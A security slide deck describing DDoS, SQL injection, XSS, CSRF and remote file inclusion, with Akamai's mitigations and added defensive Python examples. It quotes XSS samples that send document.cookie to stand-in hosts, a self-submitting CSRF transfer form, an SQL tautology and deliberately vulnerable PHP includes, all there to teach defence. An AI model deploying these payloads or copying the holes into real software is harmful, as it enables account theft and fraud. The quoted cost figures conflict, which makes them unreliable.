Internet Security and Akamai's Solutions. Preview of internet security today and how Akamai, as a cloud service provider, mitigates attacks


Agenda: How much is the cost? The most costly causes. Denial of Services. Web Attacks. Akamai's solutions.

How much is the cost? 2013 Cost of Cyber Crime Study: United States. Benchmark Study of U.S. Companies, Ponemon Institute, October 2013. Annualized cost of cyber crime: Minimum: $1.3 million. Maximum: $5.8 million. Average: $8.9 million. Increase of 26% from 2012. Source: http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf

The most costly causes. 2013 Cost of Cyber Crime Study: United States. Benchmark Study of U.S. Companies, Ponemon Institute, October 2013. Denial of Services, Web-based attacks and Malicious code account for more than 55 percent of all cyber crime costs per organization on an annual basis. Source: http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf

Denial of Services: What is it? DDoS. Akamai's solutions.

Denial of Services : What is it? Intention: prevent intended users from accessing the service(s). Mode: exploit infrastructure limitations such as network bandwidth, maximum connections, memory and CPU resources, or exploit protocol limitations. Characteristics: bursts of packet data.

Denial of Services : Real-life Case

Denial of Services : DDoS attack

Denial of Services : Amplification

Denial of Services : DNS attack. DNS server attacks are based on the protocol's characteristics: DNS relies on the User Datagram Protocol (UDP), a connectionless protocol that doesn't validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit a large amount of data in the response.

Akamai's Solutions for DoS

Akamai's Solutions for DoS. Distributed Perimeters: harder to overwhelm with a burst; packet data is filtered and only legitimate packets are forwarded to the server. Network-layer control: drop network-layer DDoS attacks, define and enforce IP whitelists/blacklists. Adaptive Rate control: mitigate application-layer DoS.
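Application-layer rate control from the slide above, as an added illustration that is not Akamai's code: a sliding-window limiter run over constructed access-log lines, denying a client that exceeds the request budget and letting it through again once old requests age out of the window. The threshold here is fixed; an adaptive product would tune it from observed baselines.

```python
import re
from collections import deque

# Constructed sample access-log lines (not from the slides): epoch seconds, client IP, path.
SAMPLE_LOG = """\
1.0 203.0.113.7 /login
1.1 203.0.113.7 /login
1.2 198.51.100.4 /index.html
1.3 203.0.113.7 /login
1.4 203.0.113.7 /login
1.5 203.0.113.7 /login
1.6 203.0.113.7 /login
5.0 198.51.100.4 /about
12.0 203.0.113.7 /login
"""

LINE_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?) (?P<ip>\S+) (?P<path>\S+)$")


def rate_limit(log_text, max_requests=5, window_seconds=10.0):
    """Sliding-window limiter: a client with max_requests requests already
    inside the window gets further requests denied until those requests
    fall out of the window. Returns a list of (ip, path, allowed)."""
    history = {}  # ip -> deque of admitted timestamps still inside the window
    decisions = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing the limiter
        ts, ip, path = float(m["ts"]), m["ip"], m["path"]
        q = history.setdefault(ip, deque())
        # Expire admitted requests older than the window.
        while q and ts - q[0] >= window_seconds:
            q.popleft()
        allowed = len(q) < max_requests
        if allowed:
            q.append(ts)  # only admitted requests count against the budget
        decisions.append((ip, path, allowed))
    return decisions


def denied_clients(decisions):
    """Clients that were throttled at least once, for alerting or blocking."""
    return sorted({ip for ip, _, ok in decisions if not ok})
```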

Web Attacks : SQL injection SQL Injection, where bogus database queries are used to overwhelm or infiltrate critical applications and databases

Web Attacks : SQL Injection. Exploits non-sanitized input in the application to execute a malicious SQL query.
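The non-sanitized-input point above, as an added example that is not from the slides: a login query built by string concatenation beside the same query parameterized, run against a constructed in-memory SQLite table so the difference is observable.

```python
import sqlite3


def make_db():
    """Constructed sample users table (not from the slides)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("bob", "hunter2"), ("maria", "s3cret")])
    return con


def login_vulnerable(con, name, password):
    # Input is pasted straight into the SQL text, so quote characters in the
    # input become part of the query's structure: the flaw the slide names.
    sql = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    return sorted(row[0] for row in con.execute(sql))


def login_safe(con, name, password):
    # Parameterized query: values travel separately from the SQL text, so
    # the input can never change what the statement does.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in con.execute(sql, (name, password)))


# The textbook tautology used in every SQL injection tutorial, here only to
# show that the parameterized version treats it as a literal password.
TAUTOLOGY = "' OR '1'='1"


def compare(con):
    """Returns (rows from the vulnerable query, rows from the safe query)."""
    return (login_vulnerable(con, "bob", TAUTOLOGY),
            login_safe(con, "bob", TAUTOLOGY))
```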

Web Attacks : Cross Site Scripting. Allows attackers to enter a script that is then executed in the user's browser, for example to steal cookies.

Web Attacks : Cross Site Scripting. Sample input into a guestbook, forum or private message:

```html
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
```

XSS

```html
"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' + escape(document.cookie);"><click Me></a></script>
```

Source: http://www.go4expert.com/articles/stealing-cookie-xss-t17066/

Web Attacks : CSRF. Combined with social engineering, to trick legitimate users into executing certain actions on the target host.

Web Attacks : CSRF Scheme

Web Attacks : CSRF. Combined with social engineering, to trick legitimate users into executing certain actions on the target host.

```http
POST http://bank.com/transfer.do HTTP/1.1

acct=bob&amount=100
```

Web Attacks : CSRF. Combined with social engineering, to trick legitimate users into executing certain actions on the target host.

```html
<form action="http://bank.com/transfer.do" method="post">
  <input type="hidden" name="acct" value="maria"/>
  <input type="hidden" name="amount" value="100000"/>
  <input type="submit" value="view my pictures"/>
</form>

<body onload="document.forms[0].submit()">
<form...
```

Akamai's Solutions for Web Attacks. Kona Site Defender with Web Application Firewall performs a 'deep inspection' of every request and response in every common form of Web traffic. Kona Rules: Akamai's Threat Intelligence Team develops and updates WAF rules continually to address new and emerging web application attacks, such as SQL injection, cross-site scripting, remote file inclusion and more.

Akamai's Solutions for Web Attacks. Application-Layer Controls: a collection of predefined, configurable application-layer firewall rules that address categories such as Protocol Violations, Request Limit Violations and HTTP Policy Violations.

To Attack Methods

Biggest saving from security technologies 2013 Cost of Cyber Crime Study: United States Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf Benchmark Study of U.S. Companies Ponemon Institute October 2013

Average days to resolve attack 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf Ponemon Institute October 2013

Remote File Injection

```php
<?php
// define $authorized = true only if user is authenticated
if (authenticated_user()) {
    $authorized = true;
}
// Because we didn't first initialize $authorized as false, this might be
// defined through register_globals, like from GET auth.php?authorized=1
// So, anyone can be seen as authenticated!
if ($authorized) {
    include "/highly/sensitive/data.php";
}
?>
```

Remote File Injection

```php
<?php
$color = 'blue';
// The request parameter chooses which file gets included, unvalidated.
if (isset($_GET['COLOR'])) {
    $color = $_GET['COLOR'];
}
require($color . '.php');
?>
```
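The COLOR example above, carried into a Python theme loader as an added illustration that is not from the slides: the request value selects the file, beside an allowlisted version that only maps known names to files. The demo builds its own temporary directory layout (themes/blue.css, themes/red.css and a secret file one level up), and the hardened loader is local-file only, so it covers the path side of the flaw rather than PHP's remote URL includes.

```python
import os
import tempfile

ALLOWED_THEMES = {"blue", "red"}   # the only names the loader may ever resolve


def setup_site():
    """Constructed demo layout (not from the slides): returns the themes dir."""
    root = tempfile.mkdtemp()
    themes = os.path.join(root, "themes")
    os.mkdir(themes)
    for name in sorted(ALLOWED_THEMES):
        with open(os.path.join(themes, name + ".css"), "w") as f:
            f.write("body { color: %s; }" % name)
    with open(os.path.join(root, "secret.css"), "w") as f:
        f.write("DB_PASSWORD=example-placeholder")   # should never be served
    return themes


def load_theme_vulnerable(themes_dir, color):
    # Mirrors require($color . '.php'): the request value becomes the path,
    # so a value like "../secret" walks out of the themes directory.
    with open(os.path.join(themes_dir, color + ".css")) as f:
        return f.read()


def load_theme_safe(themes_dir, color):
    # Validate against the allowlist first; only a known name reaches the
    # filesystem, so traversal sequences are rejected before any I/O.
    if color not in ALLOWED_THEMES:
        raise ValueError("unknown theme: %r" % color)
    return load_theme_vulnerable(themes_dir, color)  # safe once validated


def theme_request(themes_dir, color):
    """Request handler: returns (status, body) instead of raising."""
    try:
        return 200, load_theme_safe(themes_dir, color)
    except ValueError:
        return 400, "bad theme"
```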

CSRF prevention with Synchronizer Token

```html
<form action="/transfer.do" method="post">
  <input type="hidden" name="csrftoken" value="owy4nmqwode4odrjn2q2ntlhmmzlywe... wyzu1ywqwmtvhm2jmngyxyjjimgi4mjjjzde1zdz... MGYwMGEwOA==">
</form>
```

How WAF prevents CSRF. A random token is added to every form as it streams through the firewall and is validated on subsequent requests. This builds on the Application Firewall's in-line parsing of HTML to store all the links and forms sent to the client in that session. The firewall can thus validate all form fields against a stored signature to ensure no fields are added or tampered with.
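The synchronizer-token pattern from the two slides above (the hidden csrftoken field and the forged transfer form), as an added example that is not from the slides or any vendor's product: a per-session random token is embedded in the form and every state-changing request must echo it back, so a cross-site form that cannot read the victim's page has nothing valid to submit. The CsrfGuard class and handle_transfer are constructed for this illustration.

```python
import hmac
import secrets


class CsrfGuard:
    """Synchronizer-token pattern: one random token per session, embedded
    in every form and required on every state-changing request."""

    def __init__(self):
        self._tokens = {}   # session_id -> token (server-side state only)

    def token_for(self, session_id):
        if session_id not in self._tokens:
            self._tokens[session_id] = secrets.token_urlsafe(32)
        return self._tokens[session_id]

    def render_transfer_form(self, session_id):
        # Hidden csrftoken field, as on the slide's form.
        return ('<form action="/transfer.do" method="post">'
                '<input type="hidden" name="csrftoken" value="%s">'
                '<input name="acct"><input name="amount">'
                '<input type="submit" value="Transfer"></form>'
                % self.token_for(session_id))

    def validate(self, session_id, form):
        expected = self._tokens.get(session_id)
        submitted = form.get("csrftoken", "")
        if expected is None or not submitted:
            return False
        # Constant-time comparison so the check itself leaks nothing by timing.
        return hmac.compare_digest(expected, submitted)


def handle_transfer(guard, session_id, form):
    """/transfer.do handler. The forged form from the slide carries no token
    for this session, so it is rejected before any money moves."""
    if not guard.validate(session_id, form):
        return "rejected: missing or invalid CSRF token"
    return "transferred %s to %s" % (form["amount"], form["acct"])
```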

How to prevent XSS. First of all, encode all &, <, >, ", ' and / characters. This should be the first step of your XSS filter. See the encoding below:

& → &amp;
< → &lt;
> → &gt;
" → &quot;
' → &#x27;
/ → &#x2F;
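The encoding rule above, applied to the guestbook payload from the Cross Site Scripting slides, as an added example that is not from the slides: a single-pass encoder for the six characters, a guestbook renderer that encodes at output time, and a check that no raw markup survives. The guestbook entry and helper names are constructed for this illustration.

```python
# Output-encoding table from the slide: the characters that can change HTML
# context are replaced by entities before untrusted text reaches the page.
ENCODE_TABLE = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}


def encode_for_html(text):
    # One pass over the characters, so an '&' already in the input is encoded
    # exactly once and earlier replacements are never re-encoded.
    return "".join(ENCODE_TABLE.get(ch, ch) for ch in text)


# Constructed guestbook entry carrying the slide's cookie-stealing sample.
GUESTBOOK_ENTRY = (
    '<SCRIPT type="text/javascript">'
    "var adr = '../evil.php?cakemonster=' + escape(document.cookie);"
    "</SCRIPT>"
)


def render_guestbook(entries):
    # Encode at output time: the browser then renders the entry as text,
    # not as a script element.
    return "\n".join("<li>%s</li>" % encode_for_html(e) for e in entries)


def contains_active_markup(html):
    """True if any raw tag or quote character survived inside the rendered
    entries (the <li> wrappers are ours, so they are stripped first)."""
    inner = html.replace("<li>", "").replace("</li>", "")
    return any(ch in inner for ch in "<>\"'")
```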

Amplification Attacks. DNS server attacks are based on the protocol's characteristics: DNS relies on the User Datagram Protocol (UDP), a connectionless protocol that doesn't validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit a large amount of data in the response. NTP attacks use a UDP-based protocol that is prone to amplification attacks. monlist command: 234 bytes could yield a response of 100 packets for a total of more than 48K, an amplification factor of 206x.

SYN flood. Source: https://www.usenix.org/legacy/events/bsdcon02/full_papers/lemon/lemon_html/node2.html
